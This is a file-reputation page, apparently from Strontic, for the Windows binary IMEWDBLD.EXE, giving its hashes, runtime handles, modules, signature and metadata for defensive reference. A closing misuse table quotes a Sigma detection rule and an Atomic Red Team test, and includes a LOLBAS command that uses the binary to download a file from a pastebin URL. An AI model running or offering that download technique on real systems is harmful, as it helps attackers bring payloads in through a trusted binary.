IMEWDBLD.EXE

  • File Path: C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE
  • Description: Microsoft IME Open Extended Dictionary Module


Hashes

  • MD5: 77CB1EF779047326258ABC9463F8C290
  • SHA1: B73BB05A66EE61550EFF4F2A975867668BAB9523
  • SHA256: AD1FE7517FA5FCCE52A0718102C7D2C5197DF992D88D3D0C1545148702E8ED78
  • SHA384: FF8619BF0014311696E7D72ACCEBD9B81765FD86DD7B09FC3A63EDFC9DB91945B2F507EBC1D6ED25FF77060C86DDD748
  • SHA512: D9D0850B81DF19652A88E2C727634EF255B46784E2344D93F9A0B85F50FE0428331C44A80378487362C29A4591ECEF7DBC1567D1DC14E2C2E054C13944EDB040
  • SSDEEP: 6144:mgwF4/LltagHDp+rhE7l3XkZKIpeUic+pAhjq+6EhRK36cKd7Gs/UEVTppkX+:5/LGgHwE7lnkUIpeuCAhr6EPPd7Gs/r
  • IMP: 0EA5C5DA099B91F909B6707A1299A607
  • PESHA1: 115B0A8A69F7DC96990BEBC5844FC07D21B55B5D
  • PE256: 6A528E4EE96CA5AF00FC0ABEAAA37326BEC68E493E36A279853C7B04CDB0ED82

Runtime Data

Window Title:

Microsoft IME Open Extended Dictionary Error

Open Handles:

  • File (R-D): C:\Windows\Fonts\StaticCache.dat
  • File (R-D): C:\Windows\System32\en-US\KernelBase.dll.mui
  • File (R-D): C:\Windows\System32\en-US\msxml6r.dll.mui
  • File (R-D): C:\Windows\System32\en-US\netmsg.dll.mui
  • File (R-D): C:\Windows\SystemResources\imageres.dll.mun
  • File (RW-): C:\Windows\System32
  • File (RW-): C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.22000.120_none_9d947278b86cc467
  • Section: \BaseNamedObjects__ComCatalogCache__
  • Section: \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000001.db
  • Section: \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db
  • Section: \BaseNamedObjects\C:*ProgramData*Microsoft*Windows*Caches*cversions.2.ro
  • Section: \Sessions\2\BaseNamedObjects\NLS_CodePage_1252_3_2_0_0
  • Section: \Sessions\2\BaseNamedObjects\NLS_CodePage_437_3_2_0_0
  • Section: \Sessions\2\Windows\Theme1077709572
  • Section: \Windows\Theme3461253685

Loaded Modules:

  • C:\WINDOWS\System32\ADVAPI32.dll
  • C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE
  • C:\WINDOWS\System32\KERNEL32.DLL
  • C:\WINDOWS\System32\KERNELBASE.dll
  • C:\WINDOWS\SYSTEM32\ntdll.dll

Signature

  • Status: Signature verified.
  • Serial: 33000002ED2C45E4C145CF48440000000002ED
  • Thumbprint: 312860D2047EB81F8F58C29FF19ECDB4C634CF6A
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: imewdbld.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 10.0.22000.1 (WinBuild.160101.0800)
  • Product Version: 10.0.22000.1
  • Language: Language Neutral
  • Legal Copyright: Microsoft Corporation. All rights reserved.
  • Machine Type: 64-bit

File Scan

  • VirusTotal Detections: Unknown

File Similarity (ssdeep match)

File (ssdeep match score)

  • C:\Windows\system32\IME\shared\IMEWDBLD.EXE: 33
  • C:\WINDOWS\system32\IME\SHARED\IMEWDBLD.EXE: 38
  • C:\Windows\system32\IME\SHARED\IMEWDBLD.EXE: 41
  • C:\Windows\SysWOW64\IME\shared\IMEWDBLD.EXE: 36
  • C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE: 41
  • C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE: 33
  • C:\windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE: 27
  • C:\Windows\SysWOW64\IME\SHARED\IMEWDBLD.EXE: 35
  • C:\WINDOWS\SysWOW64\IME\SHARED\IMEWDBLD.EXE: 33

Possible Misuse

The following table contains possible examples of IMEWDBLD.EXE being misused. While IMEWDBLD.EXE is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source | Source File | Example | License

  • sigma | net_connection_win_imewdbld.yml | title: Download a File with IMEWDBLD.exe | DRL 1.0
  • sigma | net_connection_win_imewdbld.yml | description: Use IMEWDBLD.exe (built-in to windows) to download a file | DRL 1.0
  • sigma | net_connection_win_imewdbld.yml | Image|endswith: '\IMEWDBLD.exe' | DRL 1.0
  • LOLBAS | IMEWDBLD.yml | Name: IMEWDBLD.exe |
  • LOLBAS | IMEWDBLD.yml | - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw |
  • LOLBAS | IMEWDBLD.yml | Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> |
  • LOLBAS | IMEWDBLD.yml | - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe |
  • atomic-red-team | index.md | - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] | MIT License. © 2018 Red Canary
  • atomic-red-team | windows-index.md | - Atomic Test #17: Download a file with IMEWDBLD.exe [windows] | MIT License. © 2018 Red Canary
  • atomic-red-team | T1105.md | - Atomic Test #17 - Download a file with IMEWDBLD.exe | MIT License. © 2018 Red Canary
  • atomic-red-team | T1105.md | ## Atomic Test #17 - Download a file with IMEWDBLD.exe | MIT License. © 2018 Red Canary
  • atomic-red-team | T1105.md | Use IMEWDBLD.exe (built-in to windows) to download a file. This will throw an error for an invalid dictionary file. | MIT License. © 2018 Red Canary
  • atomic-red-team | T1105.md | $imewdbled = $env:SystemRoot + "\System32\IME\SHARED\IMEWDBLD.exe" | MIT License. © 2018 Red Canary

MIT License. Copyright (c) 2020-2021 Strontic.